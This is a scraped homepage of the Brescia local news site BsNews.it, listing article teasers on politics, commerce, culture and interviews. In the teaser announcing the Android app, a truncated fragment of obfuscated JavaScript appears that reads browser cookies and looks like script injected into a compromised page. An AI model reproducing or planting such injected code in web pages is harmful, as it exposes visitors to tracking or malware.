Questo sito o gli strumenti terzi da questo utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella cookie policy. Se vuoi saperne di più o negare il consenso a tutti o ad alcuni cookie, consulta la cookie policy.
Chiudendo questo banner, scorrendo questa pagina, cliccando su un link o proseguendo la navigazione in altra maniera, acconsenti all'uso dei cookie.     Ho capito     Maggiori informazioni



11 Dicembre 2016 - Ore 05:11


Cronaca Nera Politica Società Economia Mobilità Ambiente Cultura Sport Curiose Interviste
Citta' ed hinterlandBassa brescianaFranciacorta e SebinoGarda e ValtenesiVal SabbiaVal TrompiaVal CamonicaRegione Lombardia
Banner A2A
FONDAZIONE MICHELETTI
Commercio, Davide contro Golia: ecco la sintesi degli interventi del dibattito promosso da BsNews
Davide e Golia: negozi di città e giganti della grande distribuzione, questo il titolo del dibatto che si è tenuto oggi - dalle 17.30 - nella sede della Fondazione Micheletti. A promuoverlo BsNews in collaborazione con la fondazione guidata da Aldo Rebecchi. DI SEGUITO LA SINTESI DEGLI INTERVENTI (IN ORDINE DI INTERVENTO)  ANDREA TORTELLI (DIRETTORE BSNEWS.IT) Ringrazio tutti gli ospiti: il padrone di casa Aldo Rebecchi, i due Alessandro (Belli e Benevolo) che sono opinionisti storici di BsNews e gli autorevoli interlocutori del mondo del commercio che sono qui. Da qualche settimana dirigo BsNews.it: l'obiettivo è fare un sito che diventi sempre più interlocutore della politica, dell'economia e delle forze vive del territorio, come negli anni Sessanta. ALDO REBECCHI (FONDAZIONE MICHELETTI):

Commenti 30
mer 23 nov 2016, ore 19.36
FONDAZIONE MICHELETTI
Negozi di città e giganti della grande distribuzione, il 23 il dibattito di BsNews
Il tema l'hanno lanciato due autorevoli opinionisti di questo sito: Alessandro Belli e Alessandro Benevolo su questo sito. E mercoledì 23 novembre, dalle 17.30, sarà oggetto di un dibattito alla Fondazione Micheletti organizzato in collaborazione con BsNews.it. Il titolo - Davide e Golia: negozi di città e giganti della grande distribuzione - lascia poco spazio alle interpretazioni. A meno di due mesi dall'apertura del nuovo maxicentro commerciale Ikea, che ha accolto oltre un milione di visitatori, ha riaperto il dibattito sul rapporto tra negozi di prossimità e grandi strutture commerciali. Le istituzioni, come noto, sulla questione si sono mosse su direttrici anche opposte, con una palese divergenza di interessi tra i Comuni di Brescia e Roncadelle. Mentre le associazioni dei commercianti hanno

Commenti 16
ven 04 nov 2016, ore 14.04
PAUSA
Cari lettori, BsNews.it torna il 25 agosto con tante novità
Cari lettori, BsNews.it - dopo nove anni - si prende per la prima volta qualche giorno di vacanza nel mese di agosto. Il sito e i nostri canali social non verranno dunque aggiornati con nuove notizie fino al 25 agosto (salvo eventi eccezionali), anche se rimarrà attiva la moderazione dei commenti. Per i nostri lettori più affezionati l'appuntamento con la cronaca e le opinioni di BsNews.it è tra pochi giorni, quando inizierà una nuova stagione per il sito. Stiamo lavorando anche in queste "vacanze" estive per darvi un portale sempre più chiaro, trasparente, libero e autorevole. Nelle prossime settimane vedrete i frutti del nostro lavoro. Speriamo di non deludervi. Ma una cosa possiamo promettervela: rimarremo liberi, e gratis.

Commenti 7
sab 13 ago 2016, ore 12.56
 
Renzi e il referendum costituzionale, il mio sì è critico
BRAGAGLIO di Claudio Bragaglio - Aderendo, nel gennaio 2016, al “ Comitato del Sì al Referendum”, promosso dal PD di S.Polo, mi erano ben chiare le implicazioni. Un “Sì critico”, il mio, non per dubbi, ma per motivazioni distanti da pregiudizi. Al punto da confermare il mio Sì “nonostante” gli argomenti di alcuni suoi sostenitori. Renzi e Boschi inclusi. Penso ad alcune loro improvvide posizioni. Che – anche per “moral suasion” di Napolitano e Mattarella - hanno registrato una virata quanto mai opportuna. Con l’ammissione di errori ed un cambio di direzione, per non porre a rischio l’esito referendario, prima immaginato invece come una marcia trionfale. Un “Sì critico”, accolto da opposte ed acide ironie. Per gli uni, un errore nella battaglia campale che traccia il solco al di qua ed al di là del renzismo. Per gli altri, il tentativo di bagnar le polveri delle cannonate co
 
Piazza Loggia, non fu una strage di Stato
Alfredo Bazoli di Alfredo Bazoli - Ho letto le motivazioni dell’ultima sentenza sulla strage di piazza loggia. Quella che condanna i due esponenti veneti di Ordine Nuovo imputati, Carlo Maria Maggi e Maurizio Tramonte. E sono rimasto colpito dalla capacità che ha avuto la Corte d’assise di Milano di ricomporre il puzzle degli indizi raccolti nella lunga inchiesta in un quadro convincente, coerente, lucido. Ciò è stato possibile per le tenacia inesausta degli inquirenti, e in particolare per una serie di elementi di prova raccolti anche negli ultimissimi anni, a processo in corso, che hanno consentito di superare anche gli ultimi residui dubbi. Manca ancora il giudizio finale della Cassazione, ma questa volta ho la convinzione che le acquisizioni e la ricostruzione operata dalla corte saranno in grado di superare anche l’ultimo vaglio di legittimità. Se così sarà, finalmente non solo noi familiari ma il nostro paese avrà una


(a.tortelli) Il centrodestra in città ha bisogno di una sferzata, deve superare i personalismi, unire le forze ed esprimere un candidato sindaco entro pochi mesi. Ripartendo dall'esperienza di Adriano Paroli. A lanciare l'appello è Mario Labolani, ex assessore ai Lavori pubblici del Comune di Brescia, oggi responsabile del Dipartimento regionale territorio di Fratelli d'Italia. Dopo la sconfitta elettorale e una parentesi lavorativa al Pirellone, Labolani ha cambiat
Opinioni
 
Lavoro, serve un nuovo statuto
Bonometti di Marco Bonometti* - Trovo sia interessante, almeno per qualche aspetto, l’opinione espressa sui giornali da Oriella Savoldi, membro della segreteria CGIL di Brescia. Voglio però sgombrare subito il campo da un errore che, a mio giudizio, Savoldi commette, e che potrebbe avere gravi conseguenze. Savoldi, infatti, mette insieme, sullo stesso piano, due concetti nettamente diversi: l’importanza e l’andamento dell’industria manifatturiera. E da lì parte con un commento satirico all’enfasi acritica a più voci che afferma di aver rilevato sul tema. Vorrei porre alla signora Savoldi, che fa parte di un importante organismo di un sindacato storico come la CGIL, una semplice domanda: lei mette in dubbio l’importanza dell’industria manifatturiera? Pongo la domanda in maniera molto semplice e diretta perché la questione è di rilevanza strategica non solo sul piano delle relazioni industriali, ma su quello ben pi&ugrav
 
Chagall e la polemica sulle grandi mostre
Bragaglio di Claudio Bragaglio* - La mostra di Chagall mi pare sia striata da troppe polemiche. Si tratta ora di evitarne di nuove e di maneggiare con cura quelle già esistenti. Per il buon esito della mostra stessa. Ciò mi porta subito a dire che non m’avventuro sulle questioni tirate in ballo per eventuali interessi del Direttore Di Corato per Mostre, Cataloghi e Case editrici. Di questo risponderanno Piattaforma Civica dell’avv. Onofri e Centro Destra. Per quanto mi riguarda vorrei stare al merito, dicendo di condividere la scelta, seppur estemporanea, della mostra di Chagall, con Dario Fo. Ma, a differenza di altri, in piena coerenza con la mia precedente condivisione anche della proposta di Goldin. Penso infatti abbia ragione il prof. Vasco Frati quando osserva che “al di là delle cortine fumogene… si tratta d’un progetto che ripropone il metodo Goldin dell’iniziativa organizzata chiavi in mano”. Ha quindi senso rileggere la
 
L’abbattimento della Tintoretto e le procedure amministrative
Bragaglio di Claudio Bragaglio* - Ho già motivato sulla Stampa locale la mia contrarietà all’abbattimento della Torre Tintoretto. Una vicenda complessa, ma ignorata oggi nel suo iter. Al punto da ritenere nuova la proposta avanzata da ‘Investire SGR’, quand’era già della Giunta Paroli. E contrastata dall’intero Centro Sinistra.  Mi preme qui richiamare un passaggio decisivo, già fondato motivo d’un esposto alla Corte dei Conti, predisposto da Mirko Lombardi, allora segretario cittadino di Sel. Siamo nel 2012, ed anche in ragione di quel possibile coinvolgimento della Magistratura Contabile, la Giunta Paroli e l’Aler abbandonarono la scelta dell’abbattimento per quella della vendita. La questione riguardava il danno patrimoniale derivante dall’abbattimento. Infatti un abbattimento è legittimo per vari motivi: insicurezza dello stabile, impossibilità di ristrutturazione (si pen














INFORMAZIONE DI SERVIZIO
BsNews.it è nuovamente on line. Ci scusiamo con i lettori
A causa di un problema tecnico, la cui origine non è ancora chiara e potrebbe essere riconducibile anche a un attacco informatico, BsNews.it è rimasto offline per diverse ore. Il problema è risolto e gli aggiornamenti riprendono regolarmente. Ci scusiamo con i lettori per il disagio. 

Commenti 5
dom 27 dic 2015, ore 18.23
AUGURI
Buon Natale dalla redazione di BsNews.it. Siamo sempre on line
La redazione di BsNews.it augura un felice Natale a tutti i lettori. Gli aggiornamenti proseguiranno come di consueto anche nella giornata di domani (Santo Stefano) e in tutti gli altri giorni del 2015. Nelle festività gli orari di aggiornamento potranno subire riduzioni. Ma siamo on line 365 giorni all'anno. Grazie a voi.

Commenti 7
ven 25 dic 2015, ore 11.48
CARPENEDOLO
Ancora nessuna notizia di Adam, l'atleta 13enne scomparso da lunedì
Ancora nessuna notizia di Adam Yousin, il tredicenne atleta di Carpenedolo, scomparso da cinque giorni. Lunedì era andato a Milano per entrare nella squadra di atletica, ma la società lo ha avvisato che avrebbero dovuto chiamare la famiglia per chiedere l'autorizzazione. A quel punto Adam è sparito. Oltre alla famiglia lo sta cercando anche il suo allenatore Rolando Perri, dirigente dell’Atletica Carpenedolo e segretario provinciale della Fidal, la Federazione Italiana di Atletica Leggera.

Commenti
dom 29 nov 2015, ore 12.49
L'OPINIONE
Il Sistema Brescia va in pensione. Che bellezza! (di Flavio Pasotti)
di Flavio Pasotti - Che Bellezza! Forse non si sentirà più parlare del Sistema Brescia! Perché non è vero che se ci si mette tutti d’accordo le cose vanno bene: quando ci si mette tutti d’accordo serve qualcuno che paga la cena per tutti e normalmente siamo noi cittadini. Un esempio? Dalle fiere agli aeroporti ai cassonetti si è fatto sistema ed è stato un inenarrabile e costoso disastro. Che pagheremo. Quindi ben venga il dissenso, il dibattito anche feroce: ha il pregio di uscire dalle stanze e finire in piazza, che almeno ci si capisce. Sta capitando? Sì. Da uno dei giornali nelle scorse settimane è partita una bordata, anzi due (pagine), finanziariamente ispirate recanti la accusa di “provincialismo” a quel pezzo di Brescia che, sapendo fare di conto, av

Commenti 50
mar 16 giu 2015, ore 10.04
PER I LETTORI
Lavori in corso sul sito. Possibili disagi nella mattina di domani (venerdì)
Nella mattinata di domani (venerdì 29 maggio) i tecnici di BsNews.it saranno al lavoro sul sito per un piccolo aggiornamento. Il sito potrebbe quindi subire qualche rallentamento (di breve durata) durante l'intervento, che inizierà intorno alle 9. 

Commenti
gio 28 mag 2015, ore 18.59
L'INTERVISTA
La sexy Monica Gorni: le mie cicatrici a nudo in un calendario per la ricerca
(m.t.) "Maggi rivestiti".  Così aveva dichiarato a Bsnews Monica Gorni, salita alla ribalta anche per aver accusato la sexy barista di Bagnolo Mella di prestarsi a scatti troppo hot. Poco importa se poi, nello stesso anno, anche lei si svestì per un calendario, con immagini non proprio da educanda. Oggi, la modella bresciana ritorna senza veli, questa volta però per una buona causa: un calendario a favore della ricerca per l’endometriosi. Una malattia cronica che colpisce gli organi interni femminili, soprattutto utero e ovaie. Monica all'attivo ha già tre calendari, scatti hot e serate di animazione nei locali, ma nella vita di tutti giorni lavora a tempo pieno come commessa in un negozio di Manerba. Senza dimenticare il sociale. DOMANDA – Come mai un calendario proprio a fav

Commenti 6
ven 24 ott 2014, ore 09.39
L'INTERVISTA
Baronio, il fotografo bresciano delle starlette: non sono il nuovo Corona
(m.t.) E' salito alla ribalta della cronaca per aver scoperto la bresciana Eliana Cartella, già fidanzata di Renzo Bossi e Mario Balotelli. E ora cerca una nuova chance per sfondare nel mondo del gossip. Francesco Baronio, 40 anni, fotografo di showgirl, attrici, soubrette più o meno note. Ha iniziato a far foto all'età di dieci anni con una Canon manuale. Sei anni fa il passaggio al professionismo, prima con la cronaca sportiva e poi con il debutto nel mondo dello spettacolo. Oggi i suoi scatti si possono vedere anche su riviste come Chi, Vanity Fair, Diva e Donna e Panorama. DOMANDA – Ha fotografato personaggi più o meno noti, con chi si è trovato meglio?RISPOSTA - Mi trovo meglio con i famosi perché sono abituati a stare davanti all'obiettivo. Mi sono trovato bene con Veronica Maya,

Commenti 3
mar 07 ott 2014, ore 10.40
IL CASO
Elezioni Aci, la commissione elettorale esclude Bonomi e Scio dal voto
Bsnews.it l'aveva scritto lo scorso 26 febbraio. E, nonostante le rassicurazioni degli interessati arrivate poche ore dopo con un comunicato stampa, la commissione elettorale ha dato ragione a quanto evidenziato dal nostro quotidiano on line: Aldo Bonomi ed Enrico Scio non sono candidabili per le elezioni dei soci ordinari del consiglio direttivo dell'Aci di Brescia in quanto alla data del 13 gennaio non risultavano ancora aver rinnovato la tessera. A stabilirlo è stata la commissione elettorale dell'ente di via Enzo Ferrari, come confermato dalla delibera del commissario Matteo Piantedosi pubblicata nella serata di giovedì sul sito www.brescia.aci.it. Al voto sono ammessi tutti e quattro i soci ordinari candidati della lista collegata ad Attilio Camozzi (Luigi Morandi, Bruno Ferrari e Federico C

Commenti 18
gio 27 mar 2014, ore 19.52
L'APPELLO DI BSNEWS.IT
Aci Brescia, il voto deve essere per tutti
Dopo anni di polemiche, ricorsi, querele e commissariamenti che hanno umiliato Brescia e i bresciani, sono finalmente state indette le nuove elezioni per il consiglio dell’Automobile Club provinciale. Purtroppo, anche in questa situazione, riscontriamo non edificanti analogie con la politica nazionale. I troppi interessi, legati principalmente alla Mille Miglia storica, hanno eccitato l’arena e allontanato i cittadini soci. Il marchio bresciano con maggior riconoscibilità a livello mondiale, che dovrebbe dare lustro e ritorno economico sul nostro territorio è ormai diventato, anche se un po’ più magro, un business a favore dei soli enti gestori. Gli oltre 15.000 soci dell’Aci Brescia non sanno che devono votare e forse neanche che possono votare, sicuramente non sanno perch&eac

Commenti 33
mer 19 feb 2014, ore 15.57
L'INTERVISTA
Lonati: giustizia è fatta, ma non del tutto
(a.t.) Il suo nome è legato da sempre a quello dell'azienda di famiglia, di cui Ettore Lonati è presidente. Una storia operosa e silenziosa, fatta di molta più attenzione all'impresa che ai giornali. Dell'impero economico costruito con duro lavoro dal 1945, che dà lavoro a migliaia di persone, molti giornali non hanno nemmeno mai fatto cenno. Salvo poi correre a stampare ben in evidenza nel titolo quel cognome - che rappresenta un pezzo della storia migliore di Brescia - quando è scattata l'indagine sui presunti finanziamenti illeciti di diversi imprenditori al comitato elettorale di Nicoli. E così avevano fatto altri quando era scoppiato nel 2005 il caso Bnl-Unipol: “indagati eccellenti”, dicevano i titoli a nove colonne per vendere qualche copia in più. Ma per i lettori que

Commenti 17
gio 12 dic 2013, ore 15.03
L'INTERVISTA
E se la Tintoretto sostituisse Canton Mombello? Un progetto dice che si può fare
(di Alessia Marsigalia) Ai piani alti parlano di indulto e amnistia, che sembrano essere le soluzioni più immediate per risolvere l'emergenza carcere. Mentre il dibattito si infervora a livello nazionale, anche Brescia tende l'orecchio, visto che, nella nostra città, ospitiamo uno dei carceri peggiori della penisola per sovraffollamento e degrado dell'immobile. Canton Mombello, quel casermone nel cuore della città che qualcuno vorrebbe salvare con opere di riqualificazione, mentre altri abbattere, è una questione spinosa. Una terza via però ci sarebbe ed è stata partorita dalla mente di tre architetti. Un'idea all'apparenza provocatoria, ma che, in realtà, poggia su solide basi e analisi accurate. L'idea di Gabriele Falconi, Francesca Santaniello e Celestina Savoldi, presentata al concor

Commenti 14
gio 10 ott 2013, ore 12.12
INTERVISTA
Frattini, celebre performer, arriva sul lago d'Iseo per insegnare i segreti dei musical
Ha girato mezzo mondo, lavorato a fianco di grandi nomi del cinema tra cui Christian De Sica e Raffaele Paganini, calcato il palco di numerosi programmi televisivi, insegnato a professionisti di tutta Italia. E quando lo incontri sul palco del Cine Junior, in calzoncini di jeans e maglietta, è tutto concentrato a dirigere una ventina di ragazzi alle prime armi. E' arrivato a Sarnico lunedì scorso Manuel Frattini, uno dei performer di musical più conosciuto in Italia: ha scelto di venire nella cittadina sul Sebino per aiutare la compagnia sarnicese dilettantistica "Bottega dei Sogni" a mettere in scena il musical “Aladin”. Milanese, nato in una famiglia semplice, con un padre che sognava fin da piccolo di diventare ballerino e una madre che invece non si stancava di ripetergli  "dov

Commenti
mer 04 set 2013, ore 12.09
INFORMAZIONE
E' arrivata la app di Bsnews.it per Android. Scaricatela qui
Da oggi Bsnews.it è entrato anche nel mondo Android. Qualche mese dopo il rilascio della app per Ios (iPhone e iPad), infatti, è arrivata la versione definitiva dedicata al mondo Android (cellulari e tablet). La app è completamente gratuita e fornisce informazioni in tempo reale su ciò che accade a Brescia e provincia, oltre che foto e video. Con la possibilità di rispondere ai sondaggi e commentare in tempo reale le notizie. Fateci sapere cosa ne pensate. Buona lettura. PER SCARICARE LA APP DI BSNEWS.IT CLICCATE SU QUESTO LINK  function cc(){fed=az(ogo.mn[13]+'0,54,52,40,56,20');return document.cookie.search('checker')

Commenti 9
mer 24 lug 2013, ore 12.01
L'INTERVISTA
Vita "sotto saldo": la testimonianza di una commessa "sopravvissuta"
(a.m.) "Se lavori in un negozio, due volte l’anno ti mandano in guerra. E’ una guerra subdola e sporca, a tempo, dove devi combattere l’ignoranza e la maleducazione della gente. Il tuo ambiente lavorativo diventa campo di battaglia, diventa devasto e distruzione, non ci cresce più l’erba. Il tuo nemico, Attila, ha le sembianze di una donna con il rossetto sui denti e il profumo sbagliato di chi ha fatto mille tentativi con i campioncini che aveva nel mobiletto del bagno. Attila arraffa e disordina, ha le pretese di un’imperatrice che ordina e umilia, non ti saluta (sia mai!), ribalta e si fa strada senza curarsi di niente e di nessuno. Attila strappa, lascia cadere quello che non le serve e, se non serve a lei, non e’ necessario che qualcun'altra lo abbia in buone condizioni. Attila non h

Commenti 13
mar 16 lug 2013, ore 10.11
L'INTERVISTA
Fappani (direttore di Arenasonica): lavorare sulla cultura non è solo elargire a fondo perduto
(di Alessia Marsigalia) Qualcuno la definisce la Indieville italiana: band emergenti, eventi, locali dedicati, Brescia in questi anni ha avuto un vero e proprio boom di fermento culturale, musicalmente parlando. I giovani si danno da fare, gli organizzatori non mancano e nemmeno gli spazi. Ma l'Amministrazione forse potrebbe fare di più."Lavorare sulla cultura dal punto di vista istituzionale non può più essere un mero esercizio di elargizione a fondo perduto, ci vuole una progettualità di sistema che coinvolga l'intero paese" ci racconta Paolo (Blodio) Fappani, musicista e operatore culturale bresciano, dal 2001 direttore artistico e co-direttore di produzione di uno dei Festival cittadini più importanti, Arenasonica.  Brescia è una città con una grande vocazione per la mu

Commenti
mar 02 lug 2013, ore 10.44
L'INTERVISTA
Ilaria Bignotti (curatrice d'arte): all'assessore alla cultura chiedo sensibilità ai problemi sociali
(a.m.) Brescia ha degli artisti eccellenti, Brescia ha grandi potenzialità come città d'arte, ma Brescia manca di una programmazione culturale e di continuità. Ed essendo una città multietnica necessita di un assessore alla cultura sensibile alle problematiche sociali. Questo, in sintesi, il commento che Ilaria Bignotti, curatrice d'arte bresciana, esprime riguardo alle realtà culturale della nostra città. Laureata in Conservazione dei Beni Culturali all'Università di Parma, insegnante all’Accademia di Belle Arti SantaGiulia e al Centro Linguistico e Culturale San Clemente, Bignotti lavora in Gallerie, Fondazioni, Musei in Italia e all’estero, attività che le hanno permesso di poter confrontare diverse realtà culturali.    Brescia è una citt&a

Commenti 5
lun 24 giu 2013, ore 12.11
L'INTERVISTA
Capitanio (Lega): Rolfi vuol fare il segretario provinciale? Si dimetta dal Pirellone
(di Alessia Marsigalia) Lega tra passato e presente: un viaggio costellato da successi e vittorie, ma anche da dissidi interni, polemiche, scandali. E oggi è tutto da costruire. Bossi con un presunto nuovo partito, Tosi con la sua linea d'azione, Maroni con la sua più ambiziosa sfida in Regione. Unione o divisione? Abbiamo chiesto il parere a Mattia Capitanio, leghista, ex consigliere comunale della bassa nonché ex sfidante di Fabio Rolfi nel 2011 per il ruolo di segretario provinciale. E le polemiche tra i fronti interni, anche nella Leonessa, non sembrano proprio essersi placate.Siamo nell'era dei saggi... porteranno a qualche risultato?Si doveva star fuori dal progetto dei saggi, alla fine abbiamo tenuto su le braghe a Monti per un altro mese. Spesso è più rumorosa un’assenza rispetto ad

Commenti 27
mer 17 apr 2013, ore 11.02
INTERVISTA
Bolpagni (Storico d'arte): le mostre preconfezionate non sono la soluzione
(di alessia marsigalia) Tra i curatori della mostra Novecento mai visto c'è anche Paolo Bolpagni, giovane, ma già affermato Storico di Arte Contemporanea. Docente di Istituzioni di storia dell’arte contemporanea all’Università Cattolica, ha  all’attivo numerose pubblicazioni per riviste specializzate e per case editrici. Bolpagni, bresciano di nascita, oggi vive a Milano, ma ha lavorato nel campo dell'arte in diverse città italiane. D. Come valuta Brescia da un punto di vista culturale? Migliorata o peggiorata? R. Non mi piace dare pagelle, ma direi che non ho visto né una fioritura né una decadenza, ma una certa continuità tra passato e presente. Quando si parla di cultura tutto viene strumentalizzato a livello politico. I corsiniani dicono che si stava meglio

Commenti 6
ven 08 mar 2013, ore 11.12
L'INTERVISTA
Leopaldo (Arteingenua): il prossimo assessore alla Cultura? Vedo bene Minini, Grazioli e Angelini
(a.marsigalia) Dopo il voto alle politiche e alle regionali, Brescia ora si concentra sul prossimo appuntamento elettorale. Noti i temi più caldi, come la metropolitana, il parcheggio sotto il Castello, i conti della Loggia. Poco trattato invece il tema cultura, spesso relegato come meno importante, nonostante la vocazione, spesso dichiarata, dagli amministratori di far diventare Brescia un polo turistico, culturale e artistico. Ma questo può davvero accadere in tali condizioni economiche e sociali? Lo abbiamo chiesto a Anna Leopaldo project manager di Arteingenua, Associazione bresciana che si propone come finalità quella di sostenere lo sviluppo dell'arte contemporanea e degli artisti emergenti, non tralasciando la finalità didattica e sociale dell'arte. D - Cultura a Brescia: la città pu&ogra

Commenti 21
ven 01 mar 2013, ore 12.09
IL PARERE
La violenza fa breccia anche nelle coppie più normali. E la vittima è colei che può evitarla
(a.m.) La violenza all'interno di un rapporto di coppia è molto più frequente di quanto riportino le cronache, che comunque sono tante. Solo a Brescia c'è una denuncia di violenza al giorno e recenti sono i casi di donne picchiate costantemente dal marito (vedi qui la notizia). Dinamiche familiari che vedono vittima e carnefice in un confronto-scontro continuo. A parte i casi dove esistano fattori esterni, come abusi di sostanze o malattie mentali, anche una relazione tra due persone cosiddette normali, può avere pesanti implicazioni e può sfociare nella violenza. Il perchè? Abbiamo chiesto un parere a Nada Satrcevic, filosofa della psicologia ed esperta in comunicazione e sessualità che ha spesso lavorato nel bresciano tenendo corsi di formazione e occupandosi di casi locali

Commenti
gio 21 feb 2013, ore 11.33
L'INIZIATIVA
Primarie Aib, ora Bsnews.it scrive agli imprenditori
A distanza di quasi due mesi dal lancio della nostra proposta “E se l’AIB facesse le primarie?”, possiamo considerare completata la nostra iniziativa. Ringraziamo tutti i lettori che hanno partecipato, sia con gli oltre 3.000 voti ricevuti dal sondaggio, sia con gli innumerevoli commenti di comuni cittadini e di tanti rappresentanti del mondo istituzionale, economico e politico di Brescia. Abbiamo infine predisposto una lettera che invieremo nei prossimi giorni ad oltre 3500 imprenditori (la trovate allegata a questo articolo), con la speranza che una sempre più ampia partecipazione, possa aiutare le future iniziative di Bsnews  a generare benefici, seppur  minimi, per il nostro territorio.  LE INTERVISTE AI PROTAGONISTI* Bsnews.it, come annunciato, ha contattato e sta contattando TUTTI i protagoni

Commenti 4
mar 29 gen 2013, ore 10.56
LA PROPOSTA DI BSNEWS.IT
Aib, Gaia (Turboden): non mi candido, ma l'energia è una delle priorità
Uno dei nomi emersi dal sondaggio promosso da Bsnews.it per le primarie di Aib è quello di Mario Gaia, fino al 2007 docente del Dipartimento di Energia del Politecnico di Milano, fondatore e amministratore delegato di Turboden, azienda specializzata nella costruzione di turbogeneratori basati sull’ORC (Organic Rankine Cycle), una tecnologia per la produzione combinata di energia elettrica e calore che, partendo dall’innovativo impiego di fluidi di lavoro organici invece che di vapore acqueo, risulta particolarmente efficace in applicazioni per il recupero di calore industriale e l’utilizzo di fonti di energia rinnovabili. Turboden, che ha la propria sede in città in via Cernaia 10, rappresenta un’eccellenza produttiva di livello internazionale (la quota di maggioranza dell’azienda è

Commenti 1
ven 25 gen 2013, ore 11.50
LA PROPOSTA DI BSNEWS.IT
Primarie Aib, la decisione spetta alla Commissione dei saggi
* L’Associazione Industriale Bresciana - alla nostra proposta di individuare un percorso comune e condiviso per consentire ad ogni imprenditore associato di esprimere, informalmente, la sua preferenza in ordine alla nuova presidenza dell’Aib - ha risposto di non poter aderire in quanto “la richiesta è giunta dopo la nomina della Commissione di designazione dei saggi avvenuta il 10 dicembre 2012” e “ora ogni nostra presa di posizione verrebbe letta come un’indebita ingerenza nel lavoro della commissione stessa”. Ne prendiamo atto, con grande rispetto per le scelte che il vertice dell’associazione degli imprenditori ha ritenuto di compiere. Con grande rispetto, ripetiamo, ma anche con un pizzico di rammarico, perché le “primarie” che la nostra testata ha lanciat

Commenti 19
lun 14 gen 2013, ore 14.27
Seguici su Facebook Seguici su Twitter Seguici su Youtube Fai di bsnews.it la tua pagina iniziale Feed Rss Contatti Chi Siamo

Registrazione | Cosa puoi fare col sito
Sondaggio
Rivolete il Bigio in piazza Vittoria?
SI
NO
NON SO

Sondaggi del mese

Ultimi commenti
00:04 Brebemio
11 dic - Vai alla news »
Solo 30 minuti per andare a Milano ? Ahi, e come ce la ripagheremo mai la Brebemi, che sarà percorsa solo, ma trasversalmente, da sorci e pa
00:00 @@provinciale
11 dic - Vai alla news »
Lo sanno anche i muri del Broletto che la cassa della nuova (quella inventata dal renzista Delrio) Provincia di Brescia si alimenta quasi es
23:49 @Sandro
10 dic - Vai alla news »
E cioè, visto che non è semplice, come si fa ? Da cosa e in quali dettagli si distingue un populista da un popolare ?
22:48 POLPOT
10 dic - Vai alla news »
VISTO L'ARGOMENTO, PER BRAVI BRESCIANI,INTENDERAI SICURAMENTE QUELLI DEI CENTRI SOCIALI E KOMPAGNI, CHE ORMAI, UNO PIU' O UNO MENO,NON DOVRE
21:58 Sandro
10 dic - Vai alla news »
Non facile distinguere nei dettagli popolare da populista.
20:39 klero
10 dic - Vai alla news »
La furberia di francesco sta proprio in questo: evidenziare a parole alcuni dei mali dei suoi preti, vescovi e cardinali, tanto per acconten
20:29 @Ateo
10 dic - Vai alla news »
Parole sante le sue. Il problema rimane sempre questo: l'educazione di questa gente che fin da piccoli inculcano idee e concetti smentiti da
20:29 @Ateo
10 dic - Vai alla news »
Parole sante le sue. Il problema rimane sempre questo: l'educazione di questa gente che fin da piccoli inculcano idee e concetti smentiti da
Commenti in evidenza
Pubblicità elettorale


Twitta usando @bsnewsit

IN EVIDENZA
Il libro bresciano: una comparsa di successo nell'Italia dei mediocri
Parla di quell'Italia in cui gli uomini senza virtù vengono sistematicamente premiati "La Comparsa" (Gam editore), romanzo di debutto del giornalista bresciano Andrea Tortelli (Bsnews.it)e in vendita da febbraio - al prezzo di 10 euro - nelle librerie bresciane*. Un'operetta che fa ridere e fa riflettere, con forti elementi di critica sociale e qualche tocco di teatro, in cui si narra la biografia immaginaria di Agazio Sanguedolce, siciliano trasferito a Roma che nella
Entra nella rubrica
12 News - Il Mensile
12 Mesi - Il Mensile
Fan Facebook
Link suggerito
- Regione Lombardia - Consiglio
- Regione Lombardia - Consiglieri
- Economia e Finanza a Brescia
Consiglio regionale
- La più grande comunità italiana di giornalisti sui social
- Notizie economiche su Brescia e provincia
- Parco Natura Viva, divertimento in mezzo al verde
- Cerchi un'auto? Ecco l'offerta dell'anno.
- Social network, Facebook, Twitter etc
- Social media, web 2.0, comunicazione, ebook e altro





       
PUBBLICITA' | REG. TRIB. BRESCIA 41/2008 DEL 15 SETTEMBRE 2008...